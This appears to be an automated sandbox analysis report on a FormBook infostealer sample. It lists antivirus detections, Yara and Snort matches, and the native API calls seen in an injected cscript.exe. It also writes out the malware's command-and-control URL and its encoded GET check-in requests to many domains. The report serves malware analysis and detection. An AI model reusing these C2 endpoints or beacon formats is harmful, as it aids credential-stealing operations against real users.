Source: 1.2.85vLO1Rpcy.exe.2040000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.cscript.exe.4c87960.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.cscript.exe.2848758.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 85vLO1Rpcy.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source:	Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
Source:	Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 4x nop then pop esi	2_2_00415852
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 4x nop then pop ebx	2_2_00406A98
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 4x nop then pop edi	2_2_00415699
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop ebx	9_2_02776A99
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop esi	9_2_02785852
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop edi	9_2_02785699

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.extinctionbrews.com/dy8g/

Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.fitnesstwentytwenty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.sprinkleresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.professioneconsulenza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.iwccgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.manageoceanaccount.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 162.241.62.54 162.241.62.54

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.fitnesstwentytwenty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.sprinkleresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.professioneconsulenza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.iwccgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.manageoceanaccount.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.fitnesstwentytwenty.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 15:58:59 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>

Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmp	String found in binary or memory: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_004181D0 NtCreateFile,	2_2_004181D0
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00418280 NtReadFile,	2_2_00418280
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00418300 NtClose,	2_2_00418300
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_004183B0 NtAllocateVirtualMemory,	2_2_004183B0
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00418222 NtCreateFile,	2_2_00418222
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_004183AA NtAllocateVirtualMemory,	2_2_004183AA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_047B9860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9840 NtDelayExecution,LdrInitializeThunk,	9_2_047B9840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9540 NtReadFile,LdrInitializeThunk,	9_2_047B9540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_047B9910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B95D0 NtClose,LdrInitializeThunk,	9_2_047B95D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B99A0 NtCreateSection,LdrInitializeThunk,	9_2_047B99A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_047B9660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9A50 NtCreateFile,LdrInitializeThunk,	9_2_047B9A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9650 NtQueryValueKey,LdrInitializeThunk,	9_2_047B9650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_047B96E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B96D0 NtCreateKey,LdrInitializeThunk,	9_2_047B96D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,	9_2_047B9710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,	9_2_047B9FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,	9_2_047B9780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047BB040 NtSuspendThread,	9_2_047BB040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9820 NtEnumerateKey,	9_2_047B9820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B98F0 NtReadVirtualMemory,	9_2_047B98F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B98A0 NtWriteVirtualMemory,	9_2_047B98A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9560 NtWriteFile,	9_2_047B9560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9950 NtQueueApcThread,	9_2_047B9950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047BAD30 NtSetContextThread,	9_2_047BAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9520 NtWaitForSingleObject,	9_2_047B9520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B95F0 NtQueryInformationFile,	9_2_047B95F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B99D0 NtCreateProcessEx,	9_2_047B99D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9670 NtQueryInformationProcess,	9_2_047B9670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9A20 NtResumeThread,	9_2_047B9A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9610 NtEnumerateValueKey,	9_2_047B9610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9A10 NtQuerySection,	9_2_047B9A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9A00 NtProtectVirtualMemory,	9_2_047B9A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9A80 NtOpenDirectoryObject,	9_2_047B9A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047BA770 NtOpenThread,	9_2_047BA770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9770 NtSetInformationFile,	9_2_047B9770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9760 NtOpenProcess,	9_2_047B9760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9730 NtQueryVirtualMemory,	9_2_047B9730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047BA710 NtOpenProcessToken,	9_2_047BA710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B9B00 NtSetValueKey,	9_2_047B9B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047BA3B0 NtGetContextThread,	9_2_047BA3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B97A0 NtUnmapViewOfSection,	9_2_047B97A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02788280 NtReadFile,	9_2_02788280
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02788300 NtClose,	9_2_02788300
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_027883B0 NtAllocateVirtualMemory,	9_2_027883B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_027881D0 NtCreateFile,	9_2_027881D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02788222 NtCreateFile,	9_2_02788222
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_027883AA NtAllocateVirtualMemory,	9_2_027883AA

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0040102E	2_2_0040102E
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041B8FB	2_2_0041B8FB
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00408C6C	2_2_00408C6C
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00408C70	2_2_00408C70
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041B57A	2_2_0041B57A
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041C58A	2_2_0041C58A
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478841F	9_2_0478841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831002	9_2_04831002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478B090	9_2_0478B090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04770D20	9_2_04770D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04794120	9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477F900	9_2_0477F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478D5E0	9_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04841D55	9_2_04841D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04796E30	9_2_04796E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AEBB0	9_2_047AEBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278B8FB	9_2_0278B8FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02772FB0	9_2_02772FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02778C70	9_2_02778C70
